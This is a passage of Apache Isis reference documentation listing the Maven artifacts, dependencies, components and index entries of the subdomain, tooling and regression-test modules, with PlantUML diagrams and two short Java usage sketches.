\/subdomains\/pdfbox\/applib\n----\n|Integrates PDF Box Library\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Zip (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip\nType: pom\nDirectory: \/subdomains\/zip\n----\n|A domain service for Apache Isis, providing zipping utilities.\n\n|Apache Isis Sub - Zip (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-zip-applib\nType: jar\nDirectory: \/subdomains\/zip\/applib\n----\n|.Components\n****\no.a.i.extensions.zip.dom.impl.ZipService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n
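\nEach subdomain applib is consumed like any other Apache Isis module: the artifact goes on the classpath and its module class is imported into the application's Spring configuration. Below is a minimal sketch, assuming a hypothetical manifest class named MyAppManifest; the module class IsisModuleSubdomainsBaseApplib is the one listed in the Base section that follows, and the other subdomain applibs are imported the same way.\n\n[source,java]\n----\n\/\/ Minimal sketch (not taken from the codebase): imports the Base subdomain\n\/\/ applib into an Apache Isis (2.x) application's Spring context.\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.annotation.Import;\n\nimport org.apache.isis.subdomains.base.applib.IsisModuleSubdomainsBaseApplib;\n\n@Configuration\n@Import({\n        IsisModuleSubdomainsBaseApplib.class  \/\/ registers the module's services\n})\npublic class MyAppManifest {\n}\n----\n\n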
=== Base\n\n[plantuml,Base,svg]\n----\n@startuml(id=Base)\ntitle Base - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Base\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Base (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Base (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Base)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Base (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base\nType: pom\nDirectory: \/subdomains\/base\n----\n|A module providing Base utilities for other subdomain modules\n\n|Apache Isis Sub - Base (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-base-applib\nType: jar\nDirectory: \/subdomains\/base\/applib\n----\n|.Components\n****\no.a.i.subdomains.base.applib.services.calendar.CalendarService +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/base\/applib\/Chained.adoc[Chained], xref:refguide:subdomains:index\/base\/applib\/Dflt.adoc[Dflt], xref:refguide:subdomains:index\/base\/applib\/IsisModuleSubdomainsBaseApplib.adoc[IsisModuleSubdomainsBaseApplib], xref:refguide:subdomains:index\/base\/applib\/PowerType.adoc[PowerType], xref:refguide:subdomains:index\/base\/applib\/Titled.adoc[Titled], xref:refguide:subdomains:index\/base\/applib\/TitledEnum.adoc[TitledEnum], 
xref:refguide:subdomains:index\/base\/applib\/services\/BaseServicesModule.adoc[BaseServicesModule], xref:refguide:subdomains:index\/base\/applib\/services\/calendar\/CalendarService.adoc[CalendarService], xref:refguide:subdomains:index\/base\/applib\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:subdomains:index\/base\/applib\/types\/FqcnType.adoc[FqcnType], xref:refguide:subdomains:index\/base\/applib\/types\/MoneyType.adoc[MoneyType], xref:refguide:subdomains:index\/base\/applib\/types\/NameType.adoc[NameType], xref:refguide:subdomains:index\/base\/applib\/types\/NotesType.adoc[NotesType], xref:refguide:subdomains:index\/base\/applib\/types\/ObjectIdentifierType.adoc[ObjectIdentifierType], xref:refguide:subdomains:index\/base\/applib\/types\/PercentageType.adoc[PercentageType], xref:refguide:subdomains:index\/base\/applib\/types\/ProperNameType.adoc[ProperNameType], xref:refguide:subdomains:index\/base\/applib\/types\/ReferenceType.adoc[ReferenceType], xref:refguide:subdomains:index\/base\/applib\/types\/TitleType.adoc[TitleType], xref:refguide:subdomains:index\/base\/applib\/types\/UrlTemplateType.adoc[UrlTemplateType], xref:refguide:subdomains:index\/base\/applib\/types\/UserNameType.adoc[UserNameType], xref:refguide:subdomains:index\/base\/applib\/types\/XxxType.adoc[XxxType], xref:refguide:subdomains:index\/base\/applib\/utils\/ClassUtils.adoc[ClassUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/JodaPeriodUtils.adoc[JodaPeriodUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MathUtils.adoc[MathUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/MessageUtils.adoc[MessageUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/StringUtils.adoc[StringUtils], xref:refguide:subdomains:index\/base\/applib\/utils\/TitleBuilder.adoc[TitleBuilder], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/AbstractInterval.adoc[AbstractInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/LocalDateInterval.adoc[LocalDateInterval], xref:refguide:subdomains:index\/base\/applib\/valuetypes\/VT.adoc[VT], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeComparable.adoc[WithCodeComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeGetter.adoc[WithCodeGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithCodeUnique.adoc[WithCodeUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionComparable.adoc[WithDescriptionComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionGetter.adoc[WithDescriptionGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithDescriptionUnique.adoc[WithDescriptionUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithInterval.adoc[WithInterval], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalContiguous.adoc[WithIntervalContiguous], xref:refguide:subdomains:index\/base\/applib\/with\/WithIntervalMutable.adoc[WithIntervalMutable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameComparable.adoc[WithNameComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameGetter.adoc[WithNameGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithNameUnique.adoc[WithNameUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceComparable.adoc[WithReferenceComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceGetter.adoc[WithReferenceGetter], 
xref:refguide:subdomains:index\/base\/applib\/with\/WithReferenceUnique.adoc[WithReferenceUnique], xref:refguide:subdomains:index\/base\/applib\/with\/WithSequence.adoc[WithSequence], xref:refguide:subdomains:index\/base\/applib\/with\/WithStartDate.adoc[WithStartDate], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleComparable.adoc[WithTitleComparable], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleGetter.adoc[WithTitleGetter], xref:refguide:subdomains:index\/base\/applib\/with\/WithTitleUnique.adoc[WithTitleUnique]\n****\n|===\n\n=== Excel\n\n[plantuml,Excel,svg]\n----\n@startuml(id=Excel)\ntitle Excel - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Excel\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Excel (Fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Excel (Integ Tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Excel (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Excel (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Sub - Excel (testing support)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n}\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 6 : \"\"\n@enduml\n----\n.Projects\/Modules (Excel)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Excel (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel\nType: pom\nDirectory: \/subdomains\/excel\n----\n|A domain service for Apache Isis, allowing collections\nof (view model) objects to be exported\/imported to\/from an\nExcel spreadsheet. It also supports Excel-based fixtures.\n\n
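Below is a minimal, illustrative sketch of exporting a collection of view models through the ExcelService component listed under the applib module below. The toExcel method name and signature are an assumption (carried over from this module's incode-platform lineage), to be checked against the applib before use.\n\n[source,java]\n----\n\/\/ Illustrative sketch only: exports any list of view models to an\n\/\/ Excel spreadsheet, returned as a Blob for download.\n\/\/ NOTE: toExcel(...) is assumed, not confirmed by this document.\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport org.apache.isis.applib.value.Blob;\nimport org.apache.isis.subdomains.excel.applib.dom.ExcelService;\n\npublic class ExcelExportSample {\n\n    @Inject ExcelService excelService;\n\n    public <T> Blob exportToExcel(final List<T> viewModels, final Class<T> viewModelClass) {\n        \/\/ one worksheet named \"Sheet1\", offered for download as export.xlsx\n        return excelService.toExcel(viewModels, viewModelClass, \"Sheet1\", \"export.xlsx\");\n    }\n}\n----\n\n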
|Apache Isis Sub - Excel (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-applib\nType: jar\nDirectory: \/subdomains\/excel\/applib\n----\n|.Components\n****\no.a.i.subdomains.excel.applib.dom.ExcelService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/applib\/IsisModuleSubdomainsExcelApplib.adoc[IsisModuleSubdomainsExcelApplib], xref:refguide:subdomains:index\/excel\/applib\/dom\/AggregationType.adoc[AggregationType], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelMetaDataEnabled.adoc[ExcelMetaDataEnabled], xref:refguide:subdomains:index\/excel\/applib\/dom\/ExcelService.adoc[ExcelService], xref:refguide:subdomains:index\/excel\/applib\/dom\/HyperLink.adoc[HyperLink], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotColumn.adoc[PivotColumn], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotDecoration.adoc[PivotDecoration], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotRow.adoc[PivotRow], xref:refguide:subdomains:index\/excel\/applib\/dom\/PivotValue.adoc[PivotValue], xref:refguide:subdomains:index\/excel\/applib\/dom\/RowHandler.adoc[RowHandler], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetContent.adoc[WorksheetContent], xref:refguide:subdomains:index\/excel\/applib\/dom\/WorksheetSpec.adoc[WorksheetSpec], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationList.adoc[AnnotationList], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/AnnotationTriplet.adoc[AnnotationTriplet], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelFileBlobConverter.adoc[ExcelFileBlobConverter], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/ExcelServiceImpl.adoc[ExcelServiceImpl], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/Mode.adoc[Mode], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/PivotUtils.adoc[PivotUtils], xref:refguide:subdomains:index\/excel\/applib\/dom\/util\/SheetPivoter.adoc[SheetPivoter]\n****\n\n|Apache Isis Sub - Excel (Fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-fixtures\nType: jar\nDirectory: \/subdomains\/excel\/fixture\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-testing:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (Integ Tests)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-integtests\nType: jar\nDirectory: \/subdomains\/excel\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-fixtures:jar:<managed> 
+\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (testing support)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-testing\nType: jar\nDirectory: \/subdomains\/excel\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/testing\/ExcelFixture.adoc[ExcelFixture], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixture2.adoc[ExcelFixture2], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureRowHandler.adoc[ExcelFixtureRowHandler], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureWorkbookHandler.adoc[ExcelFixtureWorkbookHandler], xref:refguide:subdomains:index\/excel\/testing\/FixtureAwareRowHandler.adoc[FixtureAwareRowHandler], xref:refguide:subdomains:index\/excel\/testing\/IsisModuleSubdomainsExcelTesting.adoc[IsisModuleSubdomainsExcelTesting]\n****\n|===\n\n=== Spring\n\n[plantuml,Spring,svg]\n----\n@startuml(id=Spring)\ntitle Spring - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Spring\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Spring (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Spring (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Spring)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Spring (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring\nType: pom\nDirectory: \/subdomains\/spring\n----\n|Utility services for interacting with the Spring application context (that hosts the Apache Isis application itself)\n\n|Apache Isis Sub - Spring (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring-applib\nType: jar\nDirectory: \/subdomains\/spring\/applib\n----\n|.Components\n****\no.a.i.subdomains.spring.applib.service.SpringBeansService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/spring\/applib\/IsisModuleSubdomainsSpringApplib.adoc[IsisModuleSubdomainsSpringApplib], xref:refguide:subdomains:index\/spring\/applib\/service\/BeanDescriptor.adoc[BeanDescriptor], xref:refguide:subdomains:index\/spring\/applib\/service\/ContextBeans.adoc[ContextBeans], xref:refguide:subdomains:index\/spring\/applib\/service\/SpringBeansService.adoc[SpringBeansService]\n****\n|===\n\n=== XDocReport\n\n[plantuml,XDocReport,svg]\n----\n@startuml(id=XDocReport)\ntitle XDocReport - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam 
rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"XDocReport\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - XdocReport (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - XdocReport (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (XDocReport)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - XdocReport (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport\nType: pom\nDirectory: \/subdomains\/xdocreport\n----\n|Integrates XDoc Report Library\n\n|Apache Isis Sub - XdocReport (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport-applib\nType: jar\nDirectory: \/subdomains\/xdocreport\/applib\n----\n|.Components\n****\no.a.i.subdomains.xdocreport.applib.service.XDocReportService +\n****\n\n.Dependencies\n****\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.converter.docx.xwpf:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.document.docx:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.template.freemarker:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.core:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.pdf:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/xdocreport\/applib\/IsisModuleSubdomainsXDocReportApplib.adoc[IsisModuleSubdomainsXDocReportApplib], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/OutputType.adoc[OutputType], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportModel.adoc[XDocReportModel], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportService.adoc[XDocReportService]\n****\n|===\n\n== Tooling\n\n[plantuml,Tooling,svg]\n----\n@startuml(id=Tooling)\ntitle Tooling - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Tooling\\n[Software System]\" {\n rectangle \"==Apache Isis - Tooling\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Tooling - C4 Modeling\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis - Tooling - CLI (Command Line Interface)\\n<size:10>[Container: packaging: 
jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis - Tooling - Java Model (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis - Tooling - Java to Asciidoc (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis - Tooling - Model for AsciiDoc\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis - Tooling - Project Model (Code mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Tooling)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Tooling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling\nType: pom\nDirectory: \/tooling\n----\n|Libraries and tools not depending on the _Apache Isis Core_ ecosystem,\neg. code mining, automated documentation.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:3.0.1u2 +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mapstruct:mapstruct-processor:jar:1.4.2.Final +\norg.projectlombok:lombok:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Apache Isis - Tooling - C4 Modeling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-c4modeling\nType: jar\nDirectory: \/tooling\/c4modeling\n----\n|Library for programmatic C4 Model generation.\n\nSee https:\/\/c4model.com\/\n\n.Dependencies\n****\ncom.structurizr:structurizr-core:jar:<managed> +\ncom.structurizr:structurizr-plantuml:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - CLI (Command Line Interface)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-cli\nType: jar\nDirectory: \/tooling\/cli\n----\n|Command Line Interface for the _Apache Isis Tooling_ ecosystem.\n\n.Dependencies\n****\ninfo.picocli:picocli:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-c4modeling:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-java2adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-projectmodel:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java to Asciidoc (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-java2adoc\nType: jar\nDirectory: \/tooling\/java2adoc\n----\n|Code mining library for Java source to Asciidoc conversion.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java Model (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-javamodel\nType: jar\nDirectory: \/tooling\/javamodel\n----\n|Code mining library for Java bytecode introspection.\n\n.Dependencies\n****\ncom.github.andi-huber:code-assert:jar:-SNAPSHOT +\ncom.github.javaparser:javaparser-core:jar:${javaparser.version} 
+\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Model for AsciiDoc\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-model4adoc\nType: jar\nDirectory: \/tooling\/model4adoc\n----\n|Library for programmatic AsciiDoc generation.\n\nThe AsciiDoc name is trademarked by the Eclipse Foundation (https:\/\/www.eclipse.org\/).\nThis project is *not* part of the specification effort for _AsciiDoc_ under the\nAsciiDoc Working Group. See https:\/\/projects.eclipse.org\/proposals\/asciidoc-language\nand https:\/\/accounts.eclipse.org\/mailing-list\/asciidoc-wg. However, we are happy to\nhelp with the transfer of source code if any project (under the umbrella of the\nAsciiDoc Working Group) is willing to take it over.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Project Model (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-projectmodel\nType: jar\nDirectory: \/tooling\/projectmodel\n----\n|Code mining library for Gradle\/Maven project module tree introspection.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.maven:maven-model-builder:jar:<managed> +\norg.gradle:gradle-tooling-api:jar:<managed> +\n****\n|===\n\n== Regression Tests\n\n[plantuml,Regression Tests,svg]\n----\n@startuml(id=Regression_Tests)\ntitle Regression Tests - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Regression Tests\\n[Software System]\" {\n rectangle \"==Apache Isis - Regression Tests\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Regression Tests (stable)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Regression Tests)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Regression Tests\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests\nType: pom\nDirectory: \/regressiontests\n----\n|Collection of JUnit tests covering core functionality of the framework.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\norg.apache.directory.server:apacheds-test-framework:jar:2.0.0.AM26 +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-shiro-realm-ldap-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-restclient-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jpa:pom:<managed> 
